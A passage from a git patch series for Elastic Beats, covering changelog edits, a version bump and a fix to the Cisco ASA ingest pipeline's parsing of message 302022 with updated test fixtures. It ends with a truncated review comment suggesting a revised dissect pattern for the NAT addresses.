{pull}22377[22377] - Drop aws.vpcflow.pkt_srcaddr and aws.vpcflow.pkt_dstaddr when equal to "-". {pull}22721[22721] {issue}22716[22716] - Fix cisco umbrella module config by adding input variable. {pull}22892[22892] - Fix network.direction logic in zeek connection fileset. {pull}22967[22967] @@ -317,20 +262,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add support for azure light metricset app_stats. {pull}20639[20639] - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] -- Change Session ID type from int to string {pull}22359[22359] -- Fix filesystem types on Windows in filesystem metricset. {pull}22531[22531] -- Fix failiures caused by custom beat names with more than 15 characters {pull}22550[22550] -- Stop generating NaN values from Cloud Foundry module to avoid errors in outputs. {pull}22634[22634] -- Update NATS dashboards to leverage connection and route metricsets {pull}22646[22646] -- Fix rate metrics in Kafka broker metricset by using last minute rate instead of mean rate. {pull}22733[22733] - Fix `logstash` module when `xpack.enabled: true` is set from emitting redundant events. {pull}22808[22808] -- Change vsphere.datastore.capacity.used.pct value to betweeen 0 and 1. {pull}23148[23148] -- Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] -- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] -- Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] -- Unskip s3_request integration test. {pull}23887[23887] -- Add system.hostfs configuration option for system module. {pull}23831[23831] *Packetbeat* 
@@ -376,38 +308,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add capability of enriching process metadata with contianer id also for non-privileged containers in `add_process_metadata` processor. {pull}19767[19767] - Add replace_fields config option in add_host_metadata for replacing host fields. {pull}20490[20490] {issue}20464[20464] - Add option to select the type of index template to load: legacy, component, index. {pull}21212[21212] -- Add istiod metricset. {pull}21519[21519] -- Release `add_cloudfoundry_metadata` as GA. {pull}21525[21525] -- Add support for OpenStack SSL metadata APIs in `add_cloud_metadata`. {pull}21590[21590] -- Add cloud.account.id for GCP into add_cloud_metadata processor. {pull}21776[21776] -- Add proxy metricset for istio module. {pull}21751[21751] -- Add kubernetes.node.hostname metadata of Kubernetes node. {pull}22189[22189] -- Enable always add_resource_metadata for Pods and Services of kubernetes autodiscovery. {pull}22189[22189] -- Add add_resource_metadata option setting (always enabled) for add_kubernetes_metadata setting. {pull}22189[22189] -- Added Kafka version 2.2 to the list of supported versions. {pull}22328[22328] -- Add support for ephemeral containers in kubernetes autodiscover and `add_kubernetes_metadata`. {pull}22389[22389] {pull}22439[22439] -- Added support for wildcard fields and keyword fallback in beats setup commands. 
{pull}22521[22521] -- Fix polling node when it is not ready and monitor by hostname {pull}22666[22666] -- Add `expand_keys` option to `decode_json_fields` processor and `json` input, to recusively de-dot and expand json keys into hierarchical object structures {pull}22849[22849] -- Update k8s client and release k8s leader lock gracefully {pull}22919[22919] -- Improve event normalization performance {pull}22974[22974] -- Add tini as init system in docker images {pull}22137[22137] -- Added "detect_mime_type" processor for detecting mime types {pull}22940[22940] -- Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] -- Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] -- Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] -- Improve equals check. {pull}22778[22778] -- Honor kube event resysncs to handle missed watch events {pull}22668[22668] -- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] -- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] -- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] -- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] -- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] -- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] -- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] -- Add deployment name in pod's meta. {pull}23610[23610] -- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] -- Add `selector` information in kubernetes services' metadata. {pull}23730[23730] *Auditbeat* 
@@ -416,11 +316,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Log to stderr when running using reference kubernetes manifests. {pull}17443[174443] - Fix syscall kprobe arguments for 32-bit systems in socket module. {pull}17500[17500] - Add ECS categorization info for auditd module {pull}18596[18596] -- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] -- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] -- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] -- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] -- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* 
@@ -501,97 +396,13 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add related.hosts ecs field to all modules {pull}21160[21160] - Keep cursor state between httpjson input restarts {pull}20751[20751] - New juniper.srx dataset for Juniper SRX logs. {pull}20017[20017] -- Adding support for Microsoft 365 Defender (Microsoft Threat Protection) {pull}21446[21446] -- Adding support for FIPS in s3 input {pull}21446[21446] -- Adding support for Oracle Database Audit Logs {pull}21991[21991] -- Add max_number_of_messages config into s3 input. {pull}21993[21993] -- Update Okta documentation for new stateful restarts. {pull}22091[22091] -- Add SSL option to checkpoint module {pull}19560[19560] -- Added support for MySQL Enterprise audit logs. {pull}22273[22273] -- Rename googlecloud module to gcp module. {pull}22214[22214] -- Rename awscloudwatch input to aws-cloudwatch. {pull}22228[22228] -- Rename google-pubsub input to gcp-pubsub. {pull}22213[22213] -- Copy tag names from MISP data into events. {pull}21664[21664] - Added DNS response IP addresses to `related.ip` in Suricata module. {pull}22291[22291] -- Added TLS JA3 fingerprint, certificate not_before/not_after, certificate SHA1 hash, and certificate subject fields to Zeek SSL dataset. {pull}21696[21696] -- Add platform logs in the azure filebeat module. {pull}22371[22371] -- Added `event.ingested` field to data from the Netflow module. {pull}22412[22412] -- Improve panw ECS url fields mapping. {pull}22481[22481] -- Improve Nats filebeat dashboard. {pull}22726[22726] -- Add support for UNIX datagram sockets in `unix` input. {issues}18632[18632] {pull}22699[22699] -- Add `http.request.mime_type` for Elasticsearch audit log fileset. 
{pull}22975[22975] -- Add new httpjson input features and mark old config ones for deprecation {pull}22320[22320] -- Add configuration option to set external and internal networks for panw panos fileset {pull}22998[22998] -- Add `subbdomain` fields for rsa2elk modules. {pull}23035[23035] -- Add subdomain enrichment for suricata/eve fileset. {pull}23011[23011] -- Add subdomain enrichment for zeek/dns fileset. {pull}23011[23011] -- Add `event.category` "configuration" to auditd module events. {pull}23010[23010] -- Add `event.category` "configuration" to gsuite module events. {pull}23010[23010] -- Add `event.category` "configuration" to o365 module events. {pull}23010[23010] -- Add `event.category` "configuration" to zoom module events. {pull}23010[23010] -- Add `network.direction` to auditd/log fileset. {pull}23041[23041] -- Add logic for external network.direction in sophos xg fileset {pull}22973[22973] -- Preserve AWS CloudTrail eventCategory in aws.cloudtrail.event_category. {issue}22776[22776] {pull}22805[22805] -- Add top_level_domain enrichment for suricata/eve fileset. {pull}23046[23046] -- Add top_level_domain enrichment for zeek/dns fileset. {pull}23046[23046] -- Add `observer.egress.zone` and `observer.ingress.zone` for cisco/asa and cisco/ftd filesets. {pull}23068[23068] -- Allow cisco/asa and cisco/ftd filesets to override network directionality based off of zones. {pull}23068[23068] -- Allow cef and checkpoint modules to override network directionality based off of zones {pull}23066[23066] -- Add `network.direction` to netflow/log fileset. {pull}23052[23052] -- Add the ability to override `network.direction` based on interfaces in Fortinet/firewall fileset. {pull}23072[23072] -- Add `network.direction` override by specifying `internal_networks` in gcp module. 
{pull}23081[23081] -- Migrate microsoft/defender_atp to httpjson v2 config {pull}23017[23017] -- Migrate microsoft/m365_defender to httpjson v2 config {pull}23018[23018] -- Migrate okta to httpjson v2 config {pull}23059[23059] -- Add support for Snyk Vulnerability and Audit API. {pull}22677[22677] -- Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] -- Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] -- Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] -- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] -- Added support for first_event context in filebeat httpjson input {pull}23437[23437] -- Added `alternative_host` option to google pubsub input {pull}23215[23215] -- Adding Threat Intel module {pull}21795[21795] -- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] -- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] -- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by - removing unsupported processors. {pull}23763[23763] -- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] -- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] -- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] -- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] -- Move aws-s3 input to GA. {pull}23631[23631] -- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] -- Added string splitting for httpjson input {pull}24022[24022] -- Added Signatures fileset to Zeek module {pull}23772[23772] -- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. 
{pull}23819[23819] -- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] -- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] -- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] -- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] -- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] -- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] -- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] -- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] -- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] -- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] -- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] -- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] -- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] -- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] -- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] -- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] -- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] -- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] -- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] *Heartbeat* -- Add mime type detection for http responses. {pull}22976[22976] -- Bundle synthetics deps with heartbeat docker image. {pull}23274[23274] *Heartbeat* -- Update Journalbeat to ECS 1.8. {pull}23737[23737] *Heartbeat* 
@@ -650,54 +461,22 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add billing metricset into googlecloud module. {pull}20812[20812] {issue}20738[20738] - Release lambda metricset in aws module as GA. {issue}21251[21251] {pull}21255[21255] - Add dashboard for pubsub metricset in googlecloud module. {pull}21326[21326] {issue}17137[17137] -- Move Prometheus query & remote_write to GA. {pull}21507[21507] -- Map cloud data filed `cloud.account.id` to azure subscription. {pull}21483[21483] {issue}21381[21381] -- Expand unsupported option from namespace to metrics in the azure module. {pull}21486[21486] -- Move s3_daily_storage and s3_request metricsets to use cloudwatch input. {pull}21703[21703] -- Duplicate system.process.cmdline field with process.command_line ECS field name. {pull}22325[22325] -- Add awsfargate module task_stats metricset to monitor AWS ECS Fargate. {pull}22034[22034] -- Add connection and route metricsets for nats metricbeat module to collect metrics per connection/route. {pull}22445[22445] -- Add unit file states to system/service {pull}22557[22557] -- `kibana` module: `stats` metricset no-longer collects usage-related data. {pull}22732[22732] -- Add more TCP states to Metricbeat system socket_summary. {pull}14347[14347] -- Add io.ops in fields exported by system.diskio. {pull}22066[22066] -- Adjust the Apache status fields in the fleet mode. {pull}22821[22821] -- Add AWS Fargate overview dashboard. {pull}22941[22941] -- Add process.state, process.cpu.pct, process.cpu.start_time and process.memory.pct. {pull}22845[22845] -- Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] -- Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] -- Release MSSQL as GA {pull}23146[23146] -- Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] -- Add support for Darwin/arm M1. 
{pull}24019[24019] -- Check fields are documented in aws metricsets. {pull}23887[23887] *Packetbeat* -- Upgrade to ECS 1.8.0. {pull}23783[23783] -- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] *Functionbeat* -- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] -- Add support for multiple regions {pull}21065[21065] *Heartbeat* -- Add support for script processor. {pull}23229[23229] *Winlogbeat* - Set process.command_line and process.parent.command_line from Sysmon Event ID 1. {pull}17327[17327] - Add support for event IDs 4673,4674,4697,4698,4699,4700,4701,4702,4768,4769,4770,4771,4776,4778,4779,4964 to the Security module {pull}17517[17517] - Add registry and code signature information and ECS categorization fields for sysmon module {pull}18058[18058] -- Add file.pe and process.pe fields to ProcessCreate & LoadImage events in Sysmon module. {issue}17335[17335] {pull}22217[22217] -- Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] -- Add additional event categorization for security and sysmon modules. {pull}22988[22988] -- Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] -- Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] -- Add new ECS 1.8 improvements. {pull}23563[23563] -- Remove deprecated eventlogging api that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] *Elastic Log Driver* @@ -707,10 +486,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Affecting all Beats* -- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as - a hostname when Subject Alternative Name is not present from v8.0. - Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new - major version of Beats. *Filebeat* 
diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc
index 7c6f3aa2a164..a53bf859bc3f 100644
--- a/libbeat/docs/release.asciidoc
+++ b/libbeat/docs/release.asciidoc
@@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade.
+* <>
 * <>
 * <>
 * <>
From dbdc5aa212f9dfb46709d136aab817858e4bb15a Mon Sep 17 00:00:00 2001
From: Elastic Machine
Date: Tue, 23 Mar 2021 08:47:50 -0400
Subject: [PATCH 08/20] chore: update version (#24096)
Co-authored-by: Andres Rodriguez
---
 libbeat/version/version.go | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/libbeat/version/version.go b/libbeat/version/version.go
index dbc89317a81a..e90c5f6335c8 100644
--- a/libbeat/version/version.go
+++ b/libbeat/version/version.go
@@ -18,4 +18,4 @@ // Code generated by dev-tools/set_version package version
-const defaultBeatVersion = "7.12.0"
+const defaultBeatVersion = "7.12.1"
From eb6959df4fca8341f243f3ceafc58b7c89b22b03 Mon Sep 17 00:00:00 2001
From: Lee Hinman <57081003+leehinman@users.noreply.github.com>
Date: Tue, 23 Mar 2021 10:16:54 -0500
Subject: [PATCH 09/20] [Filebeat] Fix cisco asa parser for message 302022 (#24697) (#24712)
* Fix cisco asa parser for message 302022
- fix parser to include mapped address and ports
- add NAT addresses to related.ip
Closes #24695
Closes #24405
(cherry picked from commit c685997eeff4c9ca1732749e27cd9df8a89e322b)
---
 CHANGELOG.next.asciidoc | 1 +
 .../additional_messages.log-expected.json | 176 +++++++++++++++++-
 .../asa/test/hostnames.log-expected.json | 3 +
 .../cisco/asa/test/sample.log-expected.json | 10 +-
 .../cisco/ftd/test/sample.log-expected.json | 13 +-
 .../cisco/shared/ingest/asa-ftd-pipeline.yml | 12 +-
 6 files changed, 204 insertions(+), 11 deletions(-)
diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc
index 91fecb4957b4..29f2d3e114f3 100644
--- a/CHANGELOG.next.asciidoc
+++ b/CHANGELOG.next.asciidoc
@@ -200,6 +200,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d
 - Fix Cisco ASA parser for message 722051. {pull}24410[24410]
 - Fix `google_workspace` pagination. {pull}24668[24668]
 - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270]
+- Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697]
 *Heartbeat*
diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
index 2578835b3d0a..6d4d77a6515f 100644
--- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
@@ -45,7 +45,9 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "192.168.2.2"
+ "8.8.8.8",
+ "192.168.2.2",
+ "8.8.5.4"
 ],
 "service.type": "cisco",
 "source.address": "10.10.10.10",
@@ -103,7 +105,9 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "192.168.2.2"
+ "8.8.8.8",
+ "192.168.2.2",
+ "8.8.5.4"
 ],
 "service.type": "cisco",
 "source.address": "10.10.10.10",
@@ -151,6 +155,7 @@
 ],
 "related.ip": [
 "192.168.2.2",
+ "8.8.8.8",
 "10.10.10.10"
 ],
 "service.type": "cisco",
@@ -285,6 +290,7 @@
 ],
 "related.ip": [
 "192.168.2.2",
+ "8.8.8.8",
 "10.10.10.10"
 ],
 "service.type": "cisco",
@@ -340,7 +346,9 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "192.168.2.2"
+ "8.8.8.8",
+ "192.168.2.2",
+ "8.8.5.4"
 ],
 "service.type": "cisco",
 "source.address": "10.10.10.10",
@@ -615,6 +623,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
+ "8.8.8.8",
 "192.168.2.2"
 ],
 "service.type": "cisco",
@@ -749,6 +758,7 @@
 ],
 "related.ip": [
 "10.192.46.90",
+ "8.8.8.8",
 "10.10.10.10"
 ],
 "service.type": "cisco",
@@ -796,6 +806,7 @@
 ],
 "related.ip": [
 "192.168.2.2",
+ "8.8.8.8",
 "10.10.10.10"
 ],
 "service.type": "cisco",
@@ -909,6 +920,7 @@
 ],
 "related.ip": [
 "192.168.2.2",
+ "8.8.8.8",
 "10.10.10.10"
 ],
 "service.type": "cisco",
@@ -1237,7 +1249,9 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "192.168.2.2"
+ "8.8.8.4",
+ "192.168.2.2",
+ "8.8.8.8"
 ],
 "service.type": "cisco",
 "source.address": "10.10.10.10",
@@ -1295,7 +1309,9 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "192.168.2.2"
+ "8.8.8.4",
+ "192.168.2.2",
+ "8.8.8.8"
 ],
 "service.type": "cisco",
 "source.address": "10.10.10.10",
@@ -1603,6 +1619,156 @@ "forwarded" ] }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw1111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4472, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw1111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + 
"info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4631, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.1682.2.2", + "destination.domain": "192.1682.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4791, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01", + "192.1682.2.2" + ], + "related.ip": [ + "10.10.10.10" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, { 
"cisco.asa.destination_interface": "net", "cisco.asa.message_id": "302023", diff --git a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json index 70df45cbf917..6fd963a60379 100644 --- a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json @@ -36,6 +36,9 @@ "target.destination.hostname.local", "Prod-host.name.addr" ], + "related.ip": [ + "10.0.55.66" + ], "service.type": "cisco", "source.domain": "Prod-host.name.addr", "source.nat.ip": "10.0.55.66", diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json index b2c1d4cb8767..33d9e610b246 100644 --- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json @@ -451,6 +451,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -554,7 +555,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -812,7 +814,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3335,6 +3338,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3393,6 +3397,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", @@ -3450,6 +3455,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", 
diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index d416dcb068c8..ed414710ed2b 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -442,6 +442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -543,7 +544,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -796,7 +798,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3321,6 +3324,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3379,7 +3383,9 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", - "192.0.2.223" + "10.2.1.1", + "192.0.2.223", + "192.0.2.225" ], "service.type": "cisco", "source.address": "10.1.1.1", @@ -3436,6 +3442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index b76b7a69a20b..ff260fe989b7 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml 
@@ -318,7 +318,7 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '302022'" field: "message" - pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" field: "message" @@ -1614,11 +1614,21 @@ processors: value: "{{source.ip}}" if: "ctx?.source?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{source.nat.ip}}" + if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{destination.nat.ip}}" + if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" From cc7b7d808ad598048d7d908e61195dc450122baa Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 15:01:23 -0400 Subject: [PATCH 10/20] Cherry-pick #24719 to 7.12: [Filebeat] Fix gcp/vpcflow module defaulting to file input (#24734) The pubsub input was renamed from google-pubsub to gcp-pubsub and the vpcflow filesets manifest was not updated. As a result it's defaulting to the file input. This fixes the manifest. The workaround is to explicitly set the input type: vpcflow: enabled: true var.input: gcp-pubsub (cherry picked from commit 4f9194749fed812ac19daf650f89f504c934733f) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/module/gcp/vpcflow/manifest.yml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 29f2d3e114f3..4d95d7ff6db6 100644 
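Review bot: The two `%{}` skip keys added to the 302022 dissect pattern discard the mapped (NAT) address/port pairs — `(8.8.8.5/38540)` and `(8.8.8.8/10051)` in the fixtures — even though the second hunk in this same file now appends `source.nat.ip` and `destination.nat.ip` to `related.ip`, so for this message the translated addresses never reach the event or the correlation field. Capturing them keeps the pattern exactly as strict: `pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{source.nat.ip}/%{source.nat.port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{destination.nat.ip}/%{destination.nat.port})"`. This assumes the convert/cleanup steps that already populate `source.nat.ip` for other message IDs (the hostnames fixture shows that field set) also run for 302022; verify that before relying on it. Note also that the new pattern requires both parenthesised pairs to be present, so a 302022 line logged without them would fail dissect and fall through to whatever on_failure handling this 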